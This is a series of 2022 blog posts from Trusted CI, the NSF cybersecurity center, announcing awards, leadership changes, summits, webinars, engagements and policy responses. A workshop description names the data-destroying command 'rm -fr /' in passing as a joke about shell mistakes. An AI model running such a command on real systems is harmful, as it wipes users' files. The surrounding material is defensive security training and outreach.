Thursday, June 30, 2022

Trusted CI co-PI Bart Miller wins award for landmark paper on dependable computing

Bart Miller, Trusted CI co-PI, and his two student co-authors were honored with the 2022 Jean-Claude Laprie Award in Dependable Computing on June 28 in Baltimore, Md. Miller, along with L. Fredriksen, and B. So, were presented the award during the opening session of the Annual IEEE/IFIP International Conference on Dependable Systems and Networks.

The groundbreaking paper, “An Empirical Study of the Reliability of UNIX Utilities," published in 1990, launched the field of fuzz random testing, or fuzzing as it is commonly called. The paper created a new technique for easy-to-use software testing and then used that technique to evaluate UNIX utilities crashes. As part of this research, the authors also studied the root causes of the failures. They also released its code and data openly (a novelty at that time). The paper has been cited more than 1,300 times and was responsible for creating an entire new branch of testing and security research. Hundreds of papers and tens of PhD dissertations are produced each year in this area.

Today, fuzzing is taught in introductory software testing and security courses, is a prominent area of focus at numerous conferences, and is recognized by major companies. For example, Microsoft recently published a paper on how they integrate fuzzing in the life cycle of almost all their products. Similarly, Google recently reported that 80 percent of the bugs they find in production in the Chrome web browser are due to fuzzing. 

Fuzzing is heavily used in security research and is often the tool of choice for penetration testers. Thus, this paper has important implications for reliability and security research.

About Bart Miller

Bart Miller with his Cessna TR182 that he bought in 1980. He's had his commercial pilots license since 1979. 

Barton Miller is the Vilas Distinguished Achievement Professor at the University of Wisconsin-Madison. Co-PI on Trusted CI, where he leads the software assurance effort. Research interests include software security, in-depth vulnerability assessment, and binary code analysis. In 1988, Miller founded the field of fuzz random software testing, a foundation of many security and software engineering disciplines. In 1992, Miller and his then­-student Jeffrey Hollingsworth founded the field of dynamic binary code instrumentation and coined the term “dynamic instrumentation.” Miller is a Fellow of the ACM.

About the Jean-Claude Laprie Award in Dependable Computing

The award was created in 2011, in honor of Jean-Claude Laprie (1944-2010), whose pioneering contributions to the concepts and methodologies of dependability were influential in defining and unifying the field of dependable and secure computing. The award recognizes outstanding papers that have significantly influenced the theory and/or practice of dependable computing.

About IFIP WG 10.4 on Dependable Computing and Fault Tolerance

IFIP Working Group 10.4 was established in 1980 with the aim of identifying and integrating approaches, methods, and techniques for specifying, designing, building, assessing, validating, operating, and maintaining dependable computer systems (those that are reliable, available, safe, and secure). Its 75 members from around the world meet twice a year to conduct in-depth discussions of important technical topics to further the understanding of the fundamental concepts of dependable computing.

About the International Federation for Information Processing

IFIP is a non-governmental, non-profit umbrella organization for national societies working in the field of information processing. It was established in 1960 under the auspices of UNESCO as a result of the first World Computer Congress held in Paris in 1959. It is the leading multinational, apolitical organization in Information and Communications Technologies and Sciences.


Monday, June 27, 2022

Announcement of Trusted CI Director Transition

Dear Trusted CI community, friends, and partners,

After 10 years of directing Trusted CI, I am stepping down as Trusted CI Director today. I thank all of you for your support over the past decade - you have made my job both a huge privilege and a pleasure. I also extend my gratitude to NSF for providing this unique opportunity.

I’m excited to share that Jim Basney has agreed to accept the role of Trusted CI Director. Jim has served as Trusted CI’s Deputy Director for the past three years and has been part of its leadership team since its inception. I suspect most of you already know Jim and will join me in my optimism that Jim will serve as an excellent leader for Trusted CI’s second decade.

I thank Jim for his contributions as deputy, which I found invaluable, and I’m happy to also share that Jim will receive similar support from Sean Peisert, who has agreed to serve as Trusted CI Deputy Director going forward. Since Sean joined Trusted CI in 2019 he has made strong leadership contributions, including serving as a co-PI the last year  and leading annual challenges and the OSCRP effort.

Kelli Shute will be staying on as Executive Director and has my thanks for her contributions in this role both past and into the future. Jim, Sean, and Kelli will be supported by the rest of the current leadership team: Kathy Benninger, Professor Bart Miller, and Mark Krenz.

I ask you to join me in congratulating Jim and Sean, and providing them and the rest of the team with the same support and collaboration going forward which you extended to me over the past decade. You can contact Jim and Sean directly at jbasney@illinois.edu and sppeisert@lbl.gov.

While my stepping down as Trusted CI Director is part of a larger life change I am making in that I will be leaving Indiana University at the end of the month, I will remain involved with Trusted CI to support this transition. 

Thank you, it has been an honor.

Von


Wednesday, June 22, 2022

Indiana University Center for Applied Cybersecurity Research releases an “ Effective Cybersecurity for Research” Whitepaper

 The tension between cybersecurity and research has kept institutional cybersecurity efforts for research confined to the most sensitive research, especially in academia.  Evolving threats and new cybersecurity requirements scoped beyond individual awards are now slated to change the status quo.  They point to a future where securing research holistically is no longer optional.  Indiana University’s Center for Applied Cybersecurity Research released a paper this week outlining an approach to cybersecurity for research that shows great promise in breaking the prevailing security versus research impasse. It focuses exclusively on the researcher and the research mission, reduces the cybersecurity and compliance burden on the researcher, and secures not only research subject to rules and regulations, but all research.  It is being embraced by researchers voluntarily and accelerating research measurably.


The paper can be accessed by visiting this EDUCAUSE library page:  Effective Cybersecurity for Research


Tuesday, May 24, 2022

2022 NSF Cybersecurity Summit- Call for Participation is now open- Submission deadline June 10th

We are pleased to announce that the 2022 NSF Cybersecurity Summit is taking place the week of October 17th with the training and workshops occurring on Tuesday, October 18th, and plenary sessions occurring on Wednesday, October 19th, and Thursday, October 20th. 

The final program is still evolving, but we will maintain our mission of providing a format designed to increase the NSF community’s understanding of cybersecurity strategies that strengthen trustworthy science: what data, processes, and systems are crucial to the scientific mission, what risks they face, and how to protect them. 

Call for Participation (CFP)

Program content for the Summit is driven by our community. We invite proposals for plenary presentations & workshops. The deadline for CFP submissions is July 8th. To learn more about the CFP, please visit: www.trustedci.org/2022-summit-cfp

Student Program

 To support workforce development, the Summit organizers invite several students to attend the Summit at no cost every year. Both undergraduate and graduate students may apply, and no specific major or course of study is required, as long as the student is interested in learning and applying cybersecurity innovations to scientific endeavors. To learn more about the student program, visit our website: https://www.trustedci.org/summit2022/students

On behalf of the 2022 NSF Cybersecurity Summit organizers and program committee, we welcome your participation and hope to see you in October.

More information can be found at: https://www.trustedci.org/2022-cybersecurity-summit

 

Friday, May 13, 2022

Tuesday, May 10, 2022

Trusted CI Webinar: Ransomware: Threats & Mitigations, June 27th @11am EST

This event was originally scheduled to occur on May 23rd and has been rescheduled to June 27th.

REN-ISAC's Sarah Bigham and Krysten Stevens will be presenting the talk, Ransomware: Threats & Mitigations, on Monday June 27th at 11am (Eastern).

Please register here.

The education industry has unceremoniously emerged as the second most common target for ransomware. It continues to evolve in how it is used as a fund-raiser for criminal organizations and how the technology works, to keep its victims guessing as to defense and eradication. Institutions face the difficult challenge of preserving academic freedom, easy access to information, and open collaboration while defending from threat actors who exploit these same characteristics. This presentation will focus on the current threats and provide guidance on protecting against ransomware attacks.

Speaker Bios:

Sarah Bigham: joined the REN-ISAC in March 2014. As Lead Security Analyst, her day-to-day responsibilities include managing the REN-ISAC Blended Threat  Workshops, working closely with the National Council of ISACs (NCI), FBI, DHS, and other state and federal peers to stay abreast of new and emerging threats, as well as special projects, and  member relations. Before coming to the REN-ISAC, Sarah worked at Harvard University as a Systems Support Specialist focusing on campus-wide Identity & Access Management (IdM) and HIPAA compliance for Harvard University Health Services. Prior to that, Sarah was a defense contractor at the United States Naval Academy where she focused on user and desktop support across the Yard for all faculty, staff, and midshipmen. Sarah holds an Associate of Applied Science in Computer Network Management from Anne Arundel Community College (Annapolis, MD) and a Bachelor of Science in Information Systems Management from University of Maryland Global Campus. 

Krysten Stevens joined REN-ISAC as Director of Technical Operations in 2020. She has a background in IT security analysis and cyber threat intelligence from Purdue University, where she used her leadership and expertise to train other security analysts, create security awareness programs, and develop threat intelligence strategies on an organizational level. Krysten graduated from Purdue University Global with an MS Cybersecurity Management in 2020, and she holds CISSP and GCTI certifications. When not at work, Krysten enjoys spending time with her husband, two children, five cats, and two golden retrievers (who refuse to retrieve).

---

Join Trusted CI's announcements mailing list for information about upcoming events. To submit topics or requests to present, see our call for presentations. Archived presentations are available on our site under "Past Events."

Thursday, May 5, 2022

Call for Trusted CI Framework Cohort Participation

 

The Framework Cohort is a six month, group engagement aimed at facilitating adoption and implementation of the Trusted CI Framework among NSF Major Facilities. During the engagement, members of the cohort will work closely with Trusted CI to adopt the Trusted CI  Framework at their facility, emerging with a validated assessment of their cybersecurity program and a strategic plan detailing their path to fully implement each Framework Must.Cohort members will participate in six monthly workshops (each three hours) and spend no more than eight hours each month outside of the workshops on cohort assignments. The second cohort will meet from July to December 2022.

 Since January 2022, Trusted CI has been working with six Major Facilities in the inaugural Framework cohort: GAGE, LIGO, NOIRLab, NRAO, NSO and OOI. As this inaugural Framework cohort approaches completion in June 2022, Trusted CI is looking for Major Facilities that are interested in participating in the upcoming second cohort.

 NSF Major Facilities interested in participating in the Framework cohort should respond to the call by completing the form at the bottom of this page: https://www.trustedci.org/trusted-ci-framework-cohort-participation

If you have any questions, please contact us at info@trustedci.org.


2022 NSF Summit Student Program-Call For Application

Every year, Trusted CI organizes and hosts the NSF Cybersecurity Summit to bring together leaders in NSF cybersecurity and cyberinfrastructure. To support workforce development, the Summit organizers invite several students to attend the Summit at no cost every year. Both undergraduate and graduate students may apply, no specific major or course of study is required, as long as the student is interested in learning and applying cybersecurity innovations to scientific endeavors.

Students may either self-nominate or be nominated by a mentor or teacher.

To be considered, students must submit a one-page letter (800-word maximum) describing their interest in and any relevant experience with cybersecurity, emphasizing the benefit to the student and/or community of their attendance at the Summit.

This letter must include the student's name, contact information, the institution of higher education of attendance, and their current expected year of graduation. A resume may be submitted in substitution for the requested information.

Up to fifteen successful student applicants will receive invitations to attend the Summit at no cost.

All applications will be reviewed by the Program Committee and students will be selected. The Program Committee will select students with an interest in advancing diversity and inclusiveness in the program.

The deadline for applications is August 1, 2022, with notification of acceptance to be sent by August 10, 2022.

Please discuss attendance with your instructors prior to attending.

 APPLY TO ATTEND SUMMIT (FORM)


For more information on the event itself, please visit: https://www.trustedci.org/2022-cybersecurity-summit

 Tips for Applying:

 The most successful applicants will...

  • Be prepared to actively engage and participate with the programming.
  • Make it known that they are interested in complex cybersecurity needs around and new, efficient, effective ways to protect information assets while supporting science, even if they are new to the subject matter - let the program committee know why you are interested in this subject matter ; and
  • Relay at least 1-3 personal goals they would strive to meet while at the summit.

Highlighting these interests in the application will allow the review committee to understand why the student feels he or she will be best suited to attend the conference.

Send questions to students@trustedci.org

Monday, April 18, 2022

NSF Announces CICI Program Solicitation

NSF’s Office of Advanced Cyberinfrastructure recently announced solicitation 22-581 in the Cybersecurity Innovation for Cyberinfrastructure program. Proposals, due June 27, are solicited in three areas:

  • Usable and Collaborative Security for Science (UCSS)
  • Reference Scientific Security Datasets (RSSD)
  • Transition to Cyberinfrastructure Resilience (TCR)

NSF is hosting a webinar covering the objectives of the CICI program on April 27th at 2 PM Eastern. During the 90-minute webinar, Program Director Robert Beverly will discuss the program and answer questions. The presentation portion of the webinar will be recorded and posted on the CICI program website. Please register to attend.

As a reminder, you can find resources for including Trusted CI in your proposal on our website.

Tuesday, April 12, 2022

Trusted CI webinar: Updates from the Trusted CI Framework Cohort, April 25th @11am EST

Trusted CI's Scott Russell will be presenting the talk, Updates from the Trusted CI Framework Cohort, on Monday April 25th at 11am (Eastern).

Please register here.

The Trusted CI Framework is a minimum standard for cybersecurity programs. In response to cybersecurity guidance focused narrowly on cybersecurity controls, the Trusted CI Framework provides a more holistic and mission-focused standard for managing cybersecurity. In order to encourage adoption of the Trusted CI Framework, we have created a program called the Framework Cohort, where representatives from multiple NSF Major Facilities and other "Key Projects" participate in a group engagement with Trusted CI focused on adoption and implementation of the Framework.

This webinar will provide updates from the inaugural cohort, currently in progress, and discuss the opportunity to participate in future cohorts.

More information about the Framework can be found at https://www.trustedci.org/framework

Speaker Bio

Scott Russell is a Senior Policy Analyst at the Indiana University Center for Applied Cybersecurity Research. Scott was previously the Postdoctoral Fellow in Information Security Law & Policy. Scott’s work thus far has emphasized private sector cybersecurity best practices, data aggregation and the First and Fourth Amendments, and cybercrime in international law. Scott studied Computer Science and History at the University of Virginia and received his J.D. from the Indiana University, Maurer School of Law.

---

Join Trusted CI's announcements mailing list for information about upcoming events. To submit topics or requests to present, see our call for presentations. Archived presentations are available on our site under "Past Events."

Wednesday, April 6, 2022

SAVE THE DATE: Announcing the 2022 NSF Cybersecurity Summit, Oct 18-20 in Bloomington, Indiana

Please mark your calendars for the 2022 NSF Cybersecurity Summit planned for October 18-20 at the Monroe Convention Center, Bloomington, Indiana, near the Indiana University Campus.

Plenary sessions are scheduled to take place October 19th and 20th, while training and workshops will take place on the 18th.


Stay tuned for more information by following the Trusted CI Blog or our Announcement email list for more updates.


On behalf of Trusted CI


Monday, April 4, 2022

Trusted CI Fellows urge researchers to protect their data

Each year, Trusted CI selects a small number of community members to become Trusted CI Fellows. They make connections in the research cybersecurity community and receive training, knowledge, and skills from Trusted CI, which they can then take back into their local communities to advance the state of cybersecurity for research and serve as an ongoing Trusted CI liaison. Trusted CI also asks Fellows to produce a report to capture and share what they’ve learned and how it applies to their domain.

Trusted CI Fellows Deb McCaffrey and Michael Kyle have examined the security needs of higher education researchers in recently published reports. Having augmented their security knowledge from Trusted CI webinars and workshops, they advise researchers to take a systemic approach to protecting their data. 

In her Trusted CI report, Deb McCaffrey, a research computing facilitator at the University of Michigan, explores the security needs of basic and clinical research. She concludes that researchers need a better understanding of their security environments to protect their data.

Michael Kyle is a scientific applications consultant for the University of Delaware. In his Trusted CI report, he describes how researchers can manage their risks with the proper classification and protection of digital research data.

Trusted CI thanks Deb and Michael for these contributions and will highlight these and future Fellows reports in the Fellows section of the Trusted CI website.


Monday, March 28, 2022

Trusted CI Publishes 2022 Report Summarizing its Impact on Over 500 NSF Projects

Trusted CI has published its second Impacts Report analyzing our impact on the NSF community. The first report was published in 2018 and summarized our impact from 2012 to 2018. This new report updates our analysis under the current NSF cooperative agreement, which began in 2019 (award #1920430).

We define "impact" as the number of NSF projects (awards) that have had an engagement with Trusted CI or have had staff attend a Trusted CI event; including the NSF Cybersecurity Summit, webinars, and training events. Using that metric, we find that since 2012, Trusted CI has interacted with over 500 NSF projects, including over 300 NSF projects during the last 3 years (2019-2021).

The full report includes more details about our impact broken down by NSF Directorate, our engagements, Summit attendance, and more. It is available at https://doi.org/10.5281/zenodo.6350540.

Tuesday, March 22, 2022

White House Fact Sheet on cybersecurity protections

 On March 21, the White House published “FACT SHEET: Act Now to Protect Against Potential Cyberattacks” providing guidance on protection against potential Russian cyberattacks in response to sanctions. The White House post was covered by CNN, NBC News, Reuters, Bloomberg, and others.

The guidance in the Fact Sheet, specifically the Cybersecurity & infrastructure Security Agency’s (CISA) Shields Up guidance, is well established advice and in line with recommendations in Trusted CI’s Framework and software assurance guidance. Trusted CI encourages members of the NSF community who are considering or are in the process of implementing controls such as those mentioned in the Fact Sheet to have discussions among their leadership team about accelerating deployment of those protections at this time.

Trusted CI and OOI Complete Engagement

The Ocean Observatories Initiative (OOI, https://oceanobservatories.org/), funded by the NSF OCE Division of Ocean Sciences #1743430, is a science-driven ocean observing network that delivers real-time data from more than 800 instruments to address critical science questions regarding the world’s oceans. OOI data are freely available online to anyone with an Internet connection. 

The OOI provides an exponential increase in the scope and timescale of observations of the world’s oceans. Present and future educators, scientists, and researchers are able to draw conclusions about climatological and environmental processes based on these measurements, requiring the data to be accurate, with a flawless pedigree. As a result, the OOI has a requirement to protect its data from being altered by any external agent.


To this end, OOI-CI (OOI Cyberinfrastructure) solicited a consultation from Trusted CI to evaluate their current security program, along with guidance on reviewing and evaluating potential alternatives for an enhanced security posture. We refined and prioritized OOI’s needs to the following goals: (i) perform a security review of OOI’s cyberinfrastructure using the Trusted CI Security Program Evaluation worksheet, (ii) take steps toward adopting the Trusted CI Framework by developing a “master information security policies and procedures” document (MISPP), (iii) investigate and document missing policies and procedures, including questions and concerns raised by OOI, and unknowns discovered in above exercises, and (iv) provide guidance on creating an asset inventory, applying a control set, and creating and maintaining a risk registry.


The OOI team completed the Trusted CI Security Program Evaluation spreadsheet. This exercise started  the OOI team thinking about and discussing cybersecurity concerns that were raised in the evaluation, both in previously known topics, but also unknown or undefined areas. The Trusted CI team created a list of prioritized recommendations aligned with Framework Musts -- core concepts that every cybersecurity program should have -- that the OOI team can use in addressing or documenting gaps.


We introduced OOI to the Framework and Implementation Guide, and had discussions concerning the Musts, what they entail, and how they apply to and define a mature security program. The OOI team attended the 2021 NSF Cybersecurity Summit and specifically The Framework Workshop, where they were able to benefit from a deeper dive into the Framework and implementation guidance.


OOI displayed a solid grasp of the suggested security program solution, the Trusted CI Framework, and of what needs to be done to adopt it.  Completely adopting the Framework was beyond the scope of this engagement, however OOI focused on (i) developing the top-level Master Information Security Policy & Procedures (MISPP) document, (ii) develop a Cybersecurity Strategic Plan, and (iii) develop supplemental security program policies, e.g., Incident Response Plan, Disaster Recovery, and Acceptable Use Policies. 


In addition to creating top level policy documents, Trusted CI stressed the importance of having an up to date asset inventory as well as selecting and applying a base-line control set. The OOI team began identifying their critical assets as well as selecting CIS v8 as a control set and then aimed to apply controls from Implementation Groups 1 and 2. Trusted CI staff also provided a list of ‘high priority’ controls to focus on that would provide the best ROI for time and resources spent implementing.


We are pleased to announce that OOI is a participant in Trusted CI’s Framework Cohort taking place the first half of 2022 (1H2022). This will allow them to continue their work on creating and refining a mature security program while working with other NSF Major Facilities under the guidance and expertise of Trusted CI’s Framework team. 


The engagement ran from August 16, 2021 to December 31, 2021, and was recorded in the document “OOI / Trusted CI Engagement Final Report” (https://hdl.handle.net/2022/27253).


Friday, March 11, 2022

Join Us at EDUCAUSE CPP Conference - Early Registration Ends 3/22

Trusted CI will be presenting at the 2022 EDUCAUSE Cybersecurity and Privacy Professionals Conference on May 3 - 5th in Baltimore, MD. The CPPC is “the premier forum for connecting with higher education information security and privacy professionals.” Early registration for this conference ends Tuesday, March 22nd. Trusted CI’s Ishan Abhinit, Kathy Benninger, and Mark Krenz will be participating in the sessions listed below. We are looking forward to seeing you at this exciting event!

Training: Security Log Analysis
Tuesday, May 03 | 8:30AM–12:00PM ET
Presenters: Ishan and Mark
The security log analysis workshop walks participants through the security log analysis life cycle, providing considerations for centralized log collection and log management tools, phases of compromise, and examples from real attacks. We will be analyzing logs from Zeek Network Security Monitor, the Apache web server, two-factor authentication systems, cloud service logs, and others. This workshop also includes a hands-on exercise that will demonstrate techniques to analyze logs to detect security incidents using both the command line and Elastic Stack (aka ELK). The hands-on exercise will provide an overview of investigation techniques to determine security incident logs of some common attacks like SQL injection, filesystem traversal, brute force attacks, command-line injection, and more. Recent security vulnerabilities, such as log4shell, will also be discussed, along with techniques for detection. This will be an interactive session allowing Q&A and will also feature interactive polls to enhance participants' learning experience.

Training: Security in the Shell (or, How I Learned to Think Before Forking)
Tuesday, May 03 | 1:00PM–4:30PM ET
Presenters: Ishan and Mark
Although it is one of the oldest technologies in IT, the command line and terminal emulators continue to be in wide use for modern IT needs. Although people may think of these technologies as having a solid security footing, there are a number of ways someone can shoot themselves in the foot while using them, and I'm not just talking about running "rm -fr /". In this workshop, Mark Krenz, the creator of the popular Twitter account climagic, will demonstrate these and guide students through how to practice better command line security, from understanding the metadata that is generated by your favorite editor to knowing how to exploit SSH, knowing how to protect yourself when checking malware, and much more. There is something for everyone in this workshop, and you are sure to come away with a plethora of job-saving tips.

Breakout session: Security Recommendations for Science DMZs
Wednesday, May 04 | 10:45AM–11:30AM ET
Presenters: Ishan, Kathy, and Mark
A Science DMZ is a special network architecture designed to improve the speed at which large science data transfers can be made. They have become a common solution to the issue of busy academic networks causing slowdowns or failures of large data transfers. A new paper published by Trusted CI on the security of Science DMZs provides an overview of this type of network architecture, summarizing the current best practice cybersecurity risk mitigations as well as providing additional security recommendations. This session is a brief introduction to the Science DMZ concept and presents an overview of the mitigations documented in the paper.

Wednesday, March 9, 2022

Trusted CI Applauds JASON Report on Facilities Cybersecurity

In 2021, the NSF "commissioned a study by the JASON advisory group to assess and make recommendations regarding cybersecurity at NSF’s major facilities.” In December, NSF publicly released the seven recommendations from the JASON group and NSF’s response to those recommendations. Given Trusted CI’s role over the past 10 years in providing leadership and guidance to NSF Major Facilities, we welcomed the opportunity to contribute to the JASON group’s study and the dialogue it spurred. The following text consists of each of the JASON group’s recommendations, followed by the response from NSF, and Trusted CI’s response, which is the unique contribution of this document. We provide our responses to help the community understand how Trusted CI can help them as they consider these recommendations and their impact within their own projects.

  1. JASON recommendation: “NSF should maintain its current approach of supporting major facilities to enhance cybersecurity through assessments of risk, and development and implementation of mitigation plans. A prescriptive approach to cybersecurity should be avoided because it would be a poor fit to the diversity of facilities, would inefficiently use resources, and would not evolve quickly enough to keep up with changing threats.” NSF response: “NSF intends to maintain its current philosophy of performing oversight of awardee plans that are tailored to the unique natures of the individual major facilities. Through its review processes, NSF will ensure that these plans are consistent with best practices for cybersecurity that are in common between major research facilities and other types of infrastructure.”
Trusted CI response: Trusted CI will continue helping the NSF community develop and improve their cybersecurity plans which capture and prioritize best practices. Trusted CI will continue training and advising Major Facilities as they mature their cybersecurity programs and develop prioritized, mission-sensitive plans. We are available to support NSF reviews in any way that serves the community. We encourage expansion of NSF’s current approach and the inclusion of Trusted CI in the process of establishing generalized best practices for Major Facilities. We recommend those best practices align closely or equate to the Trusted CI Framework. NSF also recently released a new version of the Research Infrastructure Guide (formerly the Major Facilities Guide). Section 6.3 (Guidelines for Cybersecurity of NSF’s Major Facilities) has been significantly updated to align and refer to the Framework.

2. JASON recommendation: “An executive position for cybersecurity strategy and coordination for major facilities should be created at NSF. This executive should have authorities that allow them to continually support the balancing of cybersecurity, scientific progress, and cost in the distinct ways that will be appropriate for each facility.” 

NSF response: “NSF notes and agrees with the emphasis on such a position on strategy and coordination. NSF will explore different options for initiating the position and plans to create such a position within the next six months."

Trusted CI response: We strongly endorse this foundational recommendation and we look forward to collaborating with the new executive to fulfill our aligned missions. In Trusted CI’s experience, cybersecurity frequently proves ineffective or counterproductive when cybersecurity leadership lacks an understanding of the organization’s mission. An executive at NSF with expertise in both cybersecurity and the research mission would bring valuable additional perspective and leadership to NSF.

3. JASON recommendation: “Using annual reporting and review processes, NSF should ensure major facilities implement robust cybersecurity programs that remain consistent with current best practice.” 

NSF response: “NSF plans to review the elements of a good facility cybersecurity program, currently described in Section 6.3 of the NSF Major Facilities Guide, to ensure that this section is up to date. NSF will add cybersecurity as a required element of annual reports and program plans and conduct any additional specialized reviews based on perceived risk.”

Trusted CI response: Trusted CI helps facilities develop cybersecurity programs that help ensure productive, trustworthy science. The Trusted CI Framework is a tool to help organizations establish and refine their cybersecurity programs. In March 2021, we released the Framework Implementation Guide for Research Cyberinfrastructure Operators, which contains detailed guidance that can help major facilities implement effective cybersecurity programs and thereby addresses Section 6.3 of the Research Infrastructure Guide.

4. JASON recommendation: “NSF should develop a procedure for response to major cybersecurity incidents at its major research facilities, encompassing public relations, coordination mechanisms, and a pre-ordained chain of authority for emergency decisions. Each major facility should also have their own response plan that is both specific to its needs and consistent with NSF's plan.” 

NSF response: “NSF has charged a working group to develop a more robust response plan that integrates with both the agency's overall crisis communications plan and the response plans at the individual major facilities.”

Trusted CI response: Through our ongoing engagement activities with NSF Major Facilities and our mission "to lead in the development of an NSF Cybersecurity Ecosystem," we are uniquely positioned to provide guidance to this working group. During the past decade, we have built our understanding of cybersecurity challenges faced by the Major Facilities by hosting the annual Cybersecurity Summit, establishing and facilitating monthly meetings of the Large Facilities Security Team, and conducting 13 direct one-on-one engagements with the 10 of the Major Facilities. We look forward to bringing that experience, along with our ever-increasing understanding of the threat landscape faced by research facilities, to a productive collaboration with the working group and the executive identified in recommendation #2.

5. JASON recommendation: “NSF and the major facilities must be adequately resourced for their cyberinfrastructure and cybersecurity needs. What is appropriate will depend on each facility's unique characteristics and specific needs. The cybersecurity budget should be commensurate with perceived risk of an event, which may be unrelated to the cost of constructing or operating the facility.” 

NSF response: “NSF will work with each awardee to develop a cybersecurity risk register for each major facility and will then integrate those risk registers in order to determine the highest NSF risks and implement any needed mitigations.”

Trusted CI response: We agree with the JASON group’s assertion that Major Facilities must be adequately resourced for their cybersecurity needs. Cybersecurity spending is a necessary focus area in the expanding dialogue among Major Facilities, NSF, and other relevant stakeholders. Adequate resourcing to address unacceptable cybersecurity risk is precisely the subject of the Trusted CI Framework’s Must 11. Cybersecurity risk registers may be a helpful tool assessing whether cybersecurity spending is commensurate with the threats posed by unmitigated risk. However, the need for the allocation of cybersecurity resources is fundamental.

6. JASON recommendation: “NSF should refine facility proposal and design review processes to ensure that new major facilities plan cybersecurity as an integral part of the information technology infrastructure. NSF should regularly review the cybersecurity plans and efforts of both new and existing major facilities. Shifts to cloud-based cyberinfrastructure and to a wider range of partners will impact cybersecurity planning and need to be considered at proposal time.” 

NSF response: “NSF believes that the cybersecurity review process at the time of awards should be risk-based. NSF will work to ensure that cybersecurity is a specified element and review criterion of each call for proposals in a major facility competition. For a renewal proposal, NSF will include a requirement for submission of a cybersecurity plan. For a new construction award, or a project in the Design Stage, the cybersecurity plan will be required to be integrated with the Project Execution Plan. NSF will assure that appropriate expertise is present on review panels to assess the adequacy of the cybersecurity plan.”

Trusted CI response: We support the recommendation to require cybersecurity planning as part of facility proposal and design and would extend that recommendation to include the construction phase as well. For renewal proposals, we recommend expanding the requirement such that facilities must submit evidence of an active cybersecurity program (not just a plan). Trusted CI’s guidance provides facilities with the means to both plan and assess their programs. Prioritized, mission-based cybersecurity planning is central to the Trusted CI Framework, and we have demonstrated experience supporting NSF Major Facilities with cybersecurity strategic planning, through activities like the LFST, regular engagements, the NSF Summit and our 2022 Framework cohort.

7. JASON recommendation: “NSF should remain aware of national security concerns regarding its facilities and continue to facilitate coordination with appropriate agencies.” 

NSF response: “NSF will conduct an assessment of national security concerns that may be associated with its major research facilities.”

Trusted CI response: Several members of the Trusted CI team have experience working at the intersection of cybersecurity and national security, and we are happy to be a resource to facilities in this area. Trusted CI has a long and successful history providing tailored, actionable guidance and expertise to NSF Major Facilities. The JASON working group’s recommendations are a strong endorsement of NSF’s direction, Trusted CI’s contribution, and if followed, represent a step forward in ensuring the security of our nation’s science. Collaborating with NSF and Major Facilities to enable trustworthy science is central to Trusted CI’s mission.

Tuesday, February 22, 2022

Trusted CI Announces The 2022 Fellows

Trusted CI, the NSF Cybersecurity Center of Excellence, is excited to announce the Trusted CI Open Science Cybersecurity Fellows. Eight individuals with professional interests in cybersecurity have been selected from a nationally competitive pool.  During the year of their Fellowship, they will receive recognition and cybersecurity professional development including training and travel funding to cybersecurity-related events.

The 2022 Trusted CI Open Science Cybersecurity Fellows are:

Brian Roland
Data Management Specialist at Northwestern University 

Brian Roland provides Data Management support and consultation for researchers at Northwestern University. He supports researchers across a broad spectrum of research disciplines with data workflow design and leveraging the appropriate data storage and data transfer solutions to meet their research goals and both federal and institutional compliance needs. In addition to providing data workflow support, Brian enjoys working with his colleagues on building out institutional lines of service that help optimize the data flows involved with researchers' analysis and data management plans.

Monday, February 14, 2022

Trusted CI Webinar: The Results of the Trusted CI Annual Challenge on Software, Mon Feb. 28 @ 1pm Eastern

Members of Trusted CI are presenting the Results of the Trusted CI Annual Challenge on Software, on Monday February 28th at 1pm (Eastern). Note the time is later than previous webinars.

Please register here.

This webinar presents the results of Trusted CI's 2021 examination of the state of software assurance in scientific computing, and also gives an overview of the contents of its recently released Guide to Securing Scientific Software (GS3), aimed at helping developers of software used in scientific computing improve the security of that software.

See our blog post announcing the report:
https://blog.trustedci.org/2021/12/publication-of-trusted-ci-guide-to.html

Speaker Bios

Dr. Elisa Heymann Pignolo is a Senior Scientist on the NSF Cybersecurity Center of Excellence at the University of Wisconsin, and an Associate Professor at the Autonomous University of Barcelona. She was in charge of the Grid/Cloud security group at the UAB, and participated in two major Grid European Projects: EGI‐InSPIRE and European Middleware Initiative (EMI). Heymann's research interests include security and resource management for Grid and Cloud environments. Her research is supported by the NSF, Spanish government, the European Commission, and NATO.

Prof. Barton Miller is the Vilas Distinguished Achievement Professor and Amar & Belinder Sohi Professor in computer science at the University of Wisconsin-Madison. Prof. Miller founded the field of fuzz random testing, which is foundational to computer security and software testing. In addition, he founded (with his then-student Prof. Jeffrey Hollingsworth) the field of dynamic binary instrumentation, which is a widely used, critical technology for cyberforensics. Prof. Miller advises the Department of Defense on computer security issues though his position at the Institute for Defense Analysis and was on the Los Alamos National Laboratory Computing, Communications and Networking Division Review Committee and the US Secret Service Electronic Crimes Task Force (Chicago Area). He is currently an advisor to the Wisconsin Security Research Council. Prof. Miller is a fellow of the ACM.

Dr. Sean Peisert leads applied research and development in computer security at the Berkeley Lab and UC Davis. He is also chief cybersecurity strategist for CENIC; co-lead of Trusted CI, the NSF Cybersecurity Center of Excellence; editor-in-chief of IEEE Security & Privacy; a member of the Distinguished Expert Review Panel for the NSA Annual Best Scientific Cybersecurity Paper Competition; a member of the DARPA Information Science and Technology (ISAT) Study Group; an ACSA Senior Fellow; past chair of the IEEE Technical Committee on Security & Privacy' and is a steering committee member and past general chair of the IEEE Symposium on Security and Privacy ("Oakland").

---

Join Trusted CI's announcements mailing list for information about upcoming events. To submit topics or requests to present, see our call for presentations. Archived presentations are available on our site under "Past Events."

Wednesday, February 2, 2022

NSF publishes new Research Infrastructure Guide, bolsters alignment to Trusted CI Framework


In December, NSF published its newly-renamed Research Infrastructure Guide (RIG) (f.k.a. Major Facilities Guide). [1] During the public comment period, Trusted CI suggested updates, particularly considering our March 2021 publication of the Trusted CI Framework Implementation Guide for Research Cyberinfrastructure Operators (FIG).  

Alignment to the Trusted CI Framework

We are very pleased to see that NSF made many changes to the Research Infrastructure Guide, bringing it even more closely in line with the Trusted CI Framework, and pointing research infrastructure to the FIG as a resource. 

Those changes are captured in the cybersecurity section (6.3), as well as in the Competency Requirements for Major Facility Management (4.6.6.3), where knowledge of the Framework’s Four Pillars (Mission Alignment, Governance, Resources, and Controls) is an information technology competency. 

Operational Technology Clarification

Moreover, we applaud NSF’s clarification that operational technology [2] falls within the RIG’s definition of and scope for cybersecurity. Trusted CI advocated for this clarification. [3] 

Background

